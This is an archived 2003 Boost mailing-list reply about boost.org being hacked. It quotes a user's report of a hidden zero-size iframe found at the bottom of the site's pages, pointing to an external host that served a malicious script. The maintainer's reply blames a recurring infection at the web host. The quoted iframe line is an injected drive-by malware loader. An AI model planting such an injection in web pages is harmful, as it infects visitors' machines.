Boost :

From: Beman Dawes (bdawes_at_[hidden])
Date: 2003-09-03 15:29:17

• Next message: Raoul Gough: "[boost] Re: Has www.boost.org been hacked?"
• Previous message: Carl Daniel: "[boost] Re: Has www.boost.org been hacked?"
• In reply to: Raoul Gough: "[boost] Has www.boost.org been hacked?"
• Next in thread: Rene Rivera: "[boost] License questions... [was: Has www.boost.org been hacked?]"
• Reply: Rene Rivera: "[boost] License questions... [was: Has www.boost.org been hacked?]"

At 04:51 AM 9/3/2003, Raoul Gough wrote:

I was just looking at www.boost.org, and my browser (IE6.0) popped up
a confirmation request to run an Active-X control. Turns out that
right at the bottom of the page is the following:

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp
width=0 height=0 frameborder=0 marginwidth=0 marginheight=0>
</iframe>

Which leads to a seemingly malicious Visual Basic script at
http://ww.beech-info2.com/cgi-bin/inf2.pl which (from my limited
understanding of Visual Basic) *creates an executable* file from
hexadecimal data and then runs it. Full VB malware script follows .sig

Other pages on www.boost.org have the same problem. I believe this
should be rectified ASAP.

It appears to be fixed at the moment.

The problem is at least moderately serious, and is caused by an recurring
server infection at Interland, the web host. They fix it, it comes back,
they fix it again, and so on.

We've started testing preparatory to moving the web site to SourceForge.

Thanks,

--Beman

• Next message: Raoul Gough: "[boost] Re: Has www.boost.org been hacked?"
• Previous message: Carl Daniel: "[boost] Re: Has www.boost.org been hacked?"
• In reply to: Raoul Gough: "[boost] Has www.boost.org been hacked?"
• Next in thread: Rene Rivera: "[boost] License questions... [was: Has www.boost.org been hacked?]"
• Reply: Rene Rivera: "[boost] License questions... [was: Has www.boost.org been hacked?]"

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk